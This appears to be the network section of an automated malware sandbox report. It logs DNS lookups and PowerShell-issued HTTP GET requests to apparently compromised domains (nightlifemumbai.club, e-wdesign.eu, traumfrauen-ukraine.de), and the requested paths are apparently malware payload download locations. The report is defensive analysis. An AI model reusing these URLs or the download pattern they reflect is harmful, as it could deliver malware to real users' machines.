                                                                    Jan 26, 2021 06:54:58.673726082 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.673767090 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.673994064 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674036026 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674084902 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674123049 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674129963 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.674175978 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674213886 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674252033 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674261093 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.674290895 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674319029 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.674326897 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674406052 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.674966097 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675005913 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675052881 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675096035 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675097942 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.675132990 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675172091 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675209999 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675220013 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.675246954 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675281048 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.675286055 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675945997 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675985098 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676032066 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.676033020 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676083088 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676105022 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.676122904 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676162004 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676196098 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676233053 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.676280022 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.676703930 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676753044 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676794052 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676831961 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676872015 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676873922 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.676909924 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676947117 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676981926 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.676985025 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.677022934 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.677052975 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.677642107 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.677690029 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.677714109 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.677731991 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.677761078 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.677798986 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.678311110 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.685700893 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685746908 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685784101 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685830116 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.685830116 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685873985 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685905933 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.685909986 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685949087 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685983896 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.685986042 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686022043 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686059952 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.686098099 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686146021 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686166048 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.686187983 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686216116 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686254978 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.686491013 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686533928 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686573982 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686604977 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.686611891 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686650991 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686676979 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.686687946 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686736107 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686759949 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.686779022 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686816931 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686852932 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.687458038 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687500000 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687536001 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687572002 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.687575102 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687613964 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687649012 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687676907 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.687686920 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687726974 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687747002 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.687773943 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688122988 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.688436031 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688477039 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688517094 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688522100 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.688555956 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688566923 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.688595057 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688631058 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.688633919 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688673019 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688719988 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688752890 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688757896 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.689842939 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.906160116 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:59.306663990 CET49169443192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:59.306679010 CET4916780192.168.2.2245.138.97.75
                                                                    Jan 26, 2021 06:54:59.306695938 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:59.306799889 CET4916880192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:59.307090998 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:59.307322025 CET4916580192.168.2.22172.217.6.174

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 26, 2021 06:54:56.107897043 CET5219753192.168.2.228.8.8.8
                                                                    Jan 26, 2021 06:54:56.141604900 CET53521978.8.8.8192.168.2.22
                                                                    Jan 26, 2021 06:54:56.445627928 CET5309953192.168.2.228.8.8.8
                                                                    Jan 26, 2021 06:54:56.468636036 CET53530998.8.8.8192.168.2.22
                                                                    Jan 26, 2021 06:54:56.809792995 CET5283853192.168.2.228.8.8.8
                                                                    Jan 26, 2021 06:54:56.848565102 CET53528388.8.8.8192.168.2.22
                                                                    Jan 26, 2021 06:54:56.893301964 CET6120053192.168.2.228.8.8.8
                                                                    Jan 26, 2021 06:54:56.937766075 CET53612008.8.8.8192.168.2.22
                                                                    Jan 26, 2021 06:54:57.039805889 CET4954853192.168.2.228.8.8.8
                                                                    Jan 26, 2021 06:54:57.073834896 CET53495488.8.8.8192.168.2.22
                                                                    Jan 26, 2021 06:54:57.271550894 CET5562753192.168.2.228.8.8.8
                                                                    Jan 26, 2021 06:54:57.302871943 CET53556278.8.8.8192.168.2.22
                                                                    Jan 26, 2021 06:54:57.504921913 CET5600953192.168.2.228.8.8.8
                                                                    Jan 26, 2021 06:54:57.536298037 CET53560098.8.8.8192.168.2.22
                                                                    Jan 26, 2021 06:54:57.541701078 CET6186553192.168.2.228.8.8.8
                                                                    Jan 26, 2021 06:54:57.573136091 CET53618658.8.8.8192.168.2.22

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Jan 26, 2021 06:54:56.107897043 CET192.168.2.228.8.8.80x80acStandard query (0)nightlifemumbai.clubA (IP address)IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.445627928 CET192.168.2.228.8.8.80xd577Standard query (0)shop.nowfal.devA (IP address)IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.809792995 CET192.168.2.228.8.8.80xc52cStandard query (0)e-wdesign.euA (IP address)IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.893301964 CET192.168.2.228.8.8.80x70c0Standard query (0)traumfrauen-ukraine.deA (IP address)IN (0x0001)
                                                                    Jan 26, 2021 06:54:57.039805889 CET192.168.2.228.8.8.80x3714Standard query (0)traumfrauen-ukraine.deA (IP address)IN (0x0001)
                                                                    Jan 26, 2021 06:54:57.271550894 CET192.168.2.228.8.8.80xa6edStandard query (0)jflmktg.wpcomstaging.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Jan 26, 2021 06:54:56.141604900 CET8.8.8.8192.168.2.220x80acNo error (0)nightlifemumbai.club172.217.6.174A (IP address)IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.468636036 CET8.8.8.8192.168.2.220xd577No error (0)shop.nowfal.dev104.21.88.166A (IP address)IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.468636036 CET8.8.8.8192.168.2.220xd577No error (0)shop.nowfal.dev172.67.151.106A (IP address)IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.848565102 CET8.8.8.8192.168.2.220xc52cNo error (0)e-wdesign.eu45.138.97.75A (IP address)IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.937766075 CET8.8.8.8192.168.2.220x70c0No error (0)traumfrauen-ukraine.de212.227.200.73A (IP address)IN (0x0001)
                                                                    Jan 26, 2021 06:54:57.073834896 CET8.8.8.8192.168.2.220x3714No error (0)traumfrauen-ukraine.de212.227.200.73A (IP address)IN (0x0001)
                                                                    Jan 26, 2021 06:54:57.302871943 CET8.8.8.8192.168.2.220xa6edNo error (0)jflmktg.wpcomstaging.com192.0.78.20A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • nightlifemumbai.club
                                                                    • e-wdesign.eu
                                                                    • traumfrauen-ukraine.de

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.2249165172.217.6.17480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 26, 2021 06:54:56.291138887 CET0OUTGET /x/0wBD3/ HTTP/1.1
                                                                    Host: nightlifemumbai.club
                                                                    Connection: Keep-Alive
                                                                    Jan 26, 2021 06:54:56.420243025 CET1INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Referrer-Policy: no-referrer
                                                                    Content-Length: 1569
                                                                    Date: Tue, 26 Jan 2021 05:54:56 GMT
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                    Jan 26, 2021 06:54:56.420275927 CET2INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                    Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.224916745.138.97.7580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 26, 2021 06:54:56.864958048 CET12OUTGET /wp-content/bn1IgDejh/ HTTP/1.1
                                                                    Host: e-wdesign.eu
                                                                    Connection: Keep-Alive
                                                                    Jan 26, 2021 06:54:56.882874966 CET13INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 26 Jan 2021 05:54:56 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                    Jan 26, 2021 06:54:57.097547054 CET15INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 26 Jan 2021 05:54:56 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.2249168212.227.200.7380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 26, 2021 06:54:56.959074974 CET13OUTGET /bin/JyeS/ HTTP/1.1
                                                                    Host: traumfrauen-ukraine.de
                                                                    Connection: Keep-Alive
                                                                    Jan 26, 2021 06:54:57.029058933 CET14INHTTP/1.1 301 Moved Permanently
                                                                    Server: nginx
                                                                    Date: Tue, 26 Jan 2021 05:54:47 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/7.4.14
                                                                    P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                    Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    Pragma: no-cache
                                                                    Set-Cookie: 4bf06e271745b22ffd3a18c8d5fc8b33=9u352km2ddacitncl2qp0nh4fi; path=/; secure; HttpOnly
                                                                    X-Content-Type-Options: nosniff
                                                                    Location: https://traumfrauen-ukraine.de/bin/JyeS/
                                                                    Last-Modified: Tue, 26 Jan 2021 05:54:47 GMT
                                                                    X-Powered-By: PleskLin
                                                                    Jan 26, 2021 06:54:57.248837948 CET20INHTTP/1.1 301 Moved Permanently
                                                                    Server: nginx
                                                                    Date: Tue, 26 Jan 2021 05:54:47 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/7.4.14
                                                                    P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                    Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    Pragma: no-cache
                                                                    Set-Cookie: 4bf06e271745b22ffd3a18c8d5fc8b33=9u352km2ddacitncl2qp0nh4fi; path=/; secure; HttpOnly
                                                                    X-Content-Type-Options: nosniff
